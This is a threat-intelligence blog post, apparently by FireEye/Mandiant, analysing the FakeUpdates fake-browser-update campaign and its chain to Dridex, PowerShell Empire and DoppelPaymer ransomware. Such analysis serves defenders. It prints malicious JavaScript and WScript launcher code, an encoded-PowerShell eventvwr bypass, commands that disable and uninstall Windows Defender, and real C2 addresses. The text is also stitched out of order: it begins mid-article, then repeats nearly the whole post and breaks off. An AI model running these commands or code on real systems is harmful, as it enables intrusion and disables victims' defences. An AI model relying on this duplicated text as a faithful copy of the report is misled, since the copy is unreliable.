              Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

              When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

              1. A script is executed in memory and used to fingerprint the affected system.
              2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
              3. A script is executed in memory which:
                • Downloads and launches a third party screenshot utility.
                • Sends the captured screenshots to an attacker.
              4. The payload delivered in step 2 is subsequently executed by the script process.

              The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

              FakeUpdates: More like FakeHTTP

              After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


              Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

              The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

              The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

              • The malicious script that initialized the callback
              • System hostname
              • Current user account
              • Active Directory domain
              • Hardware details, such as manufacturer
              • Anti-virus software details
              • Running processes

              This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is subsequently XOR-encoded and sent via another custom HTTP POST request request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of sample of the second HTTP request.


              Figure 5: Second HTTP POST request after successful system information gathering

              Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

              0=500
              1=C:\Users\User\AppData\Local\Temp\Chrome.js
              2=AMD64
              3=SYSTEM1
              4=User
              5=4
              6=Windows_NT
              7=DOMAIN
              8=HP
              9=HP EliteDesk
              10=BIOS_VERSION
              11=Windows Defender|Vendor Anti-Virus
              12=Vendor Anti-Virus|Windows Defender|
              13=00:00:00:00:00:00
              14=Enhanced (101- or 102-key)
              15=USB Input Device
              16=1024x768
              17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
              svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

              Figure 6: Decoded system information gathered by the FakeUpdates malware

              After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

              • Dridex (Figure 7)
              • NetSupport Manage Remote Access Tools (RATs) (Figure 8)
              • Chthonic or AZORult (Figure 9)
                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
                          WScript.Sleep(3 * 1000);
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

              During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

              "C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

              Figure 10: Sample command used to executed the Nircmd tool to take desktop screenshots

              The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


              Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

              Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

              All Hands on Deck

              In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

              We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


              Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

              In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

              During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


              Figure 13: Attacker executed commands

              The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


              Figure 14: PowerShell event viewer bypass

              Ransomware Attacks & Operator Tactics

              Within these investigations, FireEye identified the deployment BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

              The ransomware and additional reconnaissance tools were downloaded through public sharing website repositories such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utlity PSEXEC to distribute and execute the ransomware.  

              Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

              Event Log

              EID

              Message

              Microsoft-Windows-PowerShell%4Operational

              600

               HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

              Microsoft-Windows-PowerShell%4Operational

              600

               HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

              Application

              1034

              Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

              Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring

              The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


              Figure 16: DoppelPaymer ransomware note observed observed during a Mandiant Incident Response investigation

              Ransomware? Not In My House!

              Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

              Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

              Indicators

              The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

              Type

              Indicator(s)

              FakeUpdates Files

              0e470395b2de61f6d975c92dea899b4f

              7503da20d1f83ec2ef2382ac13e238a8

              102ae3b46ddcb3d1d947d4f56c9bf88c

              aaca5e8e163503ff5fadb764433f8abb

              2c444002be9847e38ec0da861f3a702b

              62eaef72d9492a8c8d6112f250c7c4f2

              175dcf0bd1674478fb7d82887a373174
              10eefc485a42fac3b928f960a98dc451
              a2ac7b9c0a049ceecc1f17022f16fdc6

              FakeUpdates Domains & IP Addresses

              <8-Characters>.green.mattingsolutions[.]co
              <8-Characters>.www2.haciendarealhoa[.]com
              <8-Characters>.user3.altcoinfan[.]com
              93.95.100[.]178
              130.0.233[.]178
              185.243.115[.]84

              gnf6.ruscacademy[.]in

              backup.awarfaregaming[.]com

              click.clickanalytics208[.]com

              track.amishbrand[.]com

              track.positiverefreshment[.]org

              link.easycounter210[.]com

              nircmdc.exe

              8136d84d47cb62b4a4fe1f48eb64166e

              Dridex

              7239da273d3a3bfd8d169119670bb745

              72fe19810a9089cd1ec3ac5ddda22d3f
              07b0ce2dd0370392eedb0fc161c99dc7
              c8bb08283e55aed151417a9ad1bc7ad9

              6e05e84c7a993880409d7a0324c10e74

              63d4834f453ffd63336f0851a9d4c632

              0ef5c94779cd7861b5e872cd5e922311

              Empire C2

              185.122.59[.]78

              109.94.110[.]136

              Detecting the Techniques

              FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

              Platform

              Signature Name

               

              Endpoint Security

               

              HX Exploit Detection
              Empire RAT (BACKDOOR)
              EVENTVWR PARENT PROCESS (METHODOLOGY)
              Dridex (BACKDOOR)
              Dridex A (BACKDOOR)
              POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
              SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
              FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

              Network Security

              Backdoor.FAKEUPDATES
              Trojan.Downloader.FakeUpdate
              Exploit.Kit.FakeUpdate
              Trojan.SSLCert.SocGholish

              MITRE ATT&CK Technique Mapping

              ATT&CK

              Techniques

              Initial Access

              Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

              Execution

              PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

              Persistence

              DLL Search Order Hijacking (T1038)

              Privilege Escalation

              Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

              Defense Evasion

              Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

              Credential Access

              Credential Dumping (T1003)

              Discovery

              Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

              Lateral Movement

              Remote Desktop Protocol (T1076),  Remote File Copy (T1105)

              Collection

              Data from Local System (T1005), Screen Capture (T1113)

              Command And Control

              Commonly Used Port (T1436), Custom Command and Control Protocol (T1094) ,Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

              Exfiltration

              Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

              Impact

              Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

              Acknowledgements

              A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

              Catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

              Head Fake: Tackling Disruptive Ransomware Attacks

              Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

              Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


              Figure 1: Recent FakeUpdates infection chain

              Due to campaign proliferation, we have responded to this activity at both Mandiant Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

              Knock, Knock: FakeUpdates are Back!

              In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

              Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

              You Are Using an Older Version…of our Malware

              The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


              Figure 2: Example of FakeUpdate landing page after HTTP redirects

              The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

              After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

              • Heavily-obfuscated HTML applications (.hta file extensions)
              • JavaScript files (.js file extensions)
              • ZIP-compressed JavaScript files (.zip extensions)

              Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

              var domain = '//gnf6.ruscacademy[.]in/';
              var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
              var statTypeParamName = 'st';

              var filename = 'download.hta';
              var browser = 'Chrome';
              var special = '1';   
              var filePlain = window.atob(file64);
              var a = document.getElementById('buttonDownload');

              Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

              When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

              1. A script is executed in memory and used to fingerprint the affected system.
              2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
              3. A script is executed in memory which:
                • Downloads and launches a third party screenshot utility.
                • Sends the captured screenshots to an attacker.
              4. The payload delivered in step 2 is subsequently executed by the script process.

              The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

              FakeUpdates: More like FakeHTTP

              After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


              Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

              The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

              The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

              • The malicious script that initialized the callback
              • System hostname
              • Current user account
              • Active Directory domain
              • Hardware details, such as manufacturer
              • Anti-virus software details
              • Running processes

              This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is subsequently XOR-encoded and sent via another custom HTTP POST request request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of sample of the second HTTP request.


              Figure 5: Second HTTP POST request after successful system information gathering

              Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

              0=500
              1=C:\Users\User\AppData\Local\Temp\Chrome.js
              2=AMD64
              3=SYSTEM1
              4=User
              5=4
              6=Windows_NT
              7=DOMAIN
              8=HP
              9=HP EliteDesk
              10=BIOS_VERSION
              11=Windows Defender|Vendor Anti-Virus
              12=Vendor Anti-Virus|Windows Defender|
              13=00:00:00:00:00:00
              14=Enhanced (101- or 102-key)
              15=USB Input Device
              16=1024x768
              17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
              svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

              Figure 6: Decoded system information gathered by the FakeUpdates malware

              After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

              • Dridex (Figure 7)
              • NetSupport Manage Remote Access Tools (RATs) (Figure 8)
              • Chthonic or AZORult (Figure 9)
                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
                          WScript.Sleep(3 * 1000);
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

              During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

              "C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

              Figure 10: Sample command used to executed the Nircmd tool to take desktop screenshots

              The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


              Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

              Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

              All Hands on Deck

              In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

              We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


              Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

              In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

              During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


              Figure 13: Attacker executed commands

              The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


              Figure 14: PowerShell event viewer bypass

              Ransomware Attacks & Operator Tactics

              Within these investigations, FireEye identified the deployment BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

              The ransomware and additional reconnaissance tools were downloaded through public sharing website repositories such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utlity PSEXEC to distribute and execute the ransomware.  

              Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

              Event Log

              EID

              Message

              Microsoft-Windows-PowerShell%4Operational

              600

               HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

              Microsoft-Windows-PowerShell%4Operational

              600

               HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

              Application

              1034

              Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

              Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring

              The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


              Figure 16: DoppelPaymer ransomware note observed observed during a Mandiant Incident Response investigation

              Ransomware? Not In My House!

              Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

              Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

              Indicators

              The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

              Type

              Indicator(s)

              FakeUpdates Files

              0e470395b2de61f6d975c92dea899b4f

              7503da20d1f83ec2ef2382ac13e238a8

              102ae3b46ddcb3d1d947d4f56c9bf88c

              aaca5e8e163503ff5fadb764433f8abb

              2c444002be9847e38ec0da861f3a702b

              62eaef72d9492a8c8d6112f250c7c4f2

              175dcf0bd1674478fb7d82887a373174
              10eefc485a42fac3b928f960a98dc451
              a2ac7b9c0a049ceecc1f17022f16fdc6

              FakeUpdates Domains & IP Addresses

              <8-Characters>.green.mattingsolutions[.]co
              <8-Characters>.www2.haciendarealhoa[.]com
              <8-Characters>.user3.altcoinfan[.]com
              93.95.100[.]178
              130.0.233[.]178
              185.243.115[.]84

              gnf6.ruscacademy[.]in

              backup.awarfaregaming[.]com

              click.clickanalytics208[.]com

              track.amishbrand[.]com

              track.positiverefreshment[.]org

              link.easycounter210[.]com

              nircmdc.exe

              8136d84d47cb62b4a4fe1f48eb64166e

              Dridex

              7239da273d3a3bfd8d169119670bb745

              72fe19810a9089cd1ec3ac5ddda22d3f
              07b0ce2dd0370392eedb0fc161c99dc7
              c8bb08283e55aed151417a9ad1bc7ad9

              6e05e84c7a993880409d7a0324c10e74

              63d4834f453ffd63336f0851a9d4c632

              0ef5c94779cd7861b5e872cd5e922311

              Empire C2

              185.122.59[.]78

              109.94.110[.]136

              Detecting the Techniques

              FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

              Platform

              Signature Name

               

              Endpoint Security

               

              HX Exploit Detection
              Empire RAT (BACKDOOR)
              EVENTVWR PARENT PROCESS (METHODOLOGY)
              Dridex (BACKDOOR)
              Dridex A (BACKDOOR)
              POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
              SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
              FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

              Network Security

              Backdoor.FAKEUPDATES
              Trojan.Downloader.FakeUpdate
              Exploit.Kit.FakeUpdate
              Trojan.SSLCert.SocGholish

              MITRE ATT&CK Technique Mapping

              ATT&CK

              Techniques

              Initial Access

              Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

              Execution

              PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

              Persistence

              DLL Search Order Hijacking (T1038)

              Privilege Escalation

              Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

              Defense Evasion

              Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

              Credential Access

              Credential Dumping (T1003)

              Discovery

              Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

              Lateral Movement

              Remote Desktop Protocol (T1076),  Remote File Copy (T1105)

              Collection

              Data from Local System (T1005), Screen Capture (T1113)

              Command And Control

              Commonly Used Port (T1436), Custom Command and Control Protocol (T1094) ,Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

              Exfiltration

              Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

              Impact

